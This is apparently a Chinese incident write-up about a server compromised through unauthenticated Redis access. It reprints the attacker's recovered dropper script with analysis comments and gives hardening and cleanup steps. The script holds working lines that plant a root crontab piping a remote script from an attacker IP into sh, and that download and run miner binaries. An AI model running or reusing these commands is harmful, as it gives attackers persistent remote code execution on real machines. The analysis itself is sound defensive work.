1. 用 top 命令查看哪些进程耗费资源;发现两个异常进程
Paste_Image.png
2. ps -ef 查看进程源文件
Paste_Image.png
3.关闭进程, 找到源文件;删除
Paste_Image.png
4.最后发现一个远程的病毒脚本（下面是从机器上恢复出来的脚本原文，仅作分析之用，切勿执行。注意它通过 crontab 每 5 分钟重新下载并执行自身，所以只杀进程、删 /tmp 下的文件而不清理 /var/spool/cron 里的定时任务，几分钟后就会再次感染）
# NOTE(review): this is the attacker's dropper script as recovered from the
# compromised host, reproduced here as evidence for analysis only. Do NOT run
# it. The IP, URLs and file paths below are indicators of compromise (IOCs).
#
# Append the usual binary directories to PATH so curl/chmod/ps/awk resolve
# even when the script is started with a minimal PATH (presumably the case
# when it is launched from cron or from the exploited service).
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence: replace root's crontab with one entry that re-fetches and
# re-runs the remote script every 5 minutes. Consequences for responders:
#  - killing the processes / deleting /tmp files is not enough; this entry
#    re-infects the host within 5 minutes unless it is removed too;
#  - the redirect is ">" (truncate), so any legitimate root cron jobs that
#    existed before are gone;
#  - writing here only works with root privileges, which is why running the
#    exploited service as root matters.
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/root
# Same entry written to the other common crontab spool layout
# (/var/spool/cron/crontabs/<user> is the Debian-family location,
# /var/spool/cron/<user> the RHEL-family one), so persistence takes effect
# regardless of distribution. Both files must be cleaned up.
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/crontabs/root
# Stage 1 payload: download an architecture-specific binary (the URL is
# built from `uname -m`, e.g. ddg.x86_64) into /tmp unless a file of that
# name already exists, then mark it executable and run it. What ddg.1001
# does is not visible from this script.
if [ ! -f "/tmp/ddg.1001" ]; then
curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001
# Kill rival malware: terminate every process whose `ps auxf` line contains
# one of the listed paths or mining-pool hostnames (minerd, moneropool.com,
# crypto-pool.fr — i.e. competing cryptominers and their droppers in /tmp
# and /opt). `grep -v grep` drops the grep process itself from the match.
# Because these are plain substring matches on the whole ps line, legitimate
# processes are hit as well: e.g. "/usr/sbin/ntp" also matches the real
# ntpd and "/usr/bin/cron" matches the system cron daemon.
# NOTE(review): CleanTail is defined but never called anywhere in the part
# of the script shown here.
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
# Stage 2 payload: fetch /tmp/wnTKYg from the same host unless a file of
# that name already exists, then make it executable and run it.
# The binary's purpose is not shown in this script; the mining-pool names
# in CleanTail suggest a cryptominer, but that is an inference — confirm
# from the sample itself.
# Side note for responders: the existence check only looks at the path, so
# the download is skipped if anything is already at /tmp/wnTKYg, yet the
# chmod +x and execution still happen on whatever file is there.
DoTKY()
{
if [ ! -f "/tmp/wnTKYg" ]; then
curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
fi
chmod +x /tmp/wnTKYg
/tmp/wnTKYg
}
# Variant of DoTKY that fetches and runs /tmp/wnTKYg.noaes instead. The
# ".noaes" suffix presumably denotes a build that does not rely on AES CPU
# instructions (unconfirmed — only the filename hints at it). Same
# download-if-missing, chmod +x, execute pattern as DoTKY.
DoTKYnoAES()
{
if [ ! -f "/tmp/wnTKYg.noaes" ]; then
curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
fi
chmod +x /tmp/wnTKYg.noaes
/tmp/wnTKYg.noaes
}
# Kill any process whose ps line contains "AnXqV" (nothing in this script
# says what that is; presumably an older or competing payload name).
ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
# Start the stage 2 payload only if no process matching "wnTKYg" is already
# running: the `||` runs DoTKY when the grep finds nothing.
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
# Re-check right away. If still no wnTKYg process exists (i.e. the first
# binary did not start or exited immediately), fall back to the .noaes
# variant. This pattern is also what makes the process name "wnTKYg" a
# useful IOC for this infection.
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES
5. 事故原因
网上搜索后得知这是 redis 未授权访问问题:严格说不是 redis 代码上的漏洞,而是安装后没有设置密码、也没有限制登录来源并且暴露在公网上,任何人用
redis-cli -h IP 就可以直接远程登录 redis。攻击者通常利用这种无需认证的访问(配合 redis 以 root 身份运行)把数据写到任意文件,例如写入 root 的 crontab,这与上面脚本里往 /var/spool/cron/root 写定时任务的行为是一致的。
6. 解决方法
1. 设置 redis 密码(requirepass),并尽量换成足够长的随机口令
2. 限制远程登录的来源 IP:优先用 bind 127.0.0.1 只监听本机,确需远程访问时用防火墙/安全组只放行可信 IP,不要把 6379 端口暴露到公网
3. 不使用 root 用户运行 redis(改用低权限专用账号,这样即使被未授权访问也写不了 /var/spool/cron 这类系统文件)
4. 清理时不能只杀进程:还要删除 /var/spool/cron/root、/var/spool/cron/crontabs/root 中的恶意定时任务以及 /tmp 下的 ddg.1001、wnTKYg、wnTKYg.noaes 等文件,否则每 5 分钟会重新下载;考虑到机器已被以 root 身份完全控制,更稳妥的做法是重装系统后再按上述方式加固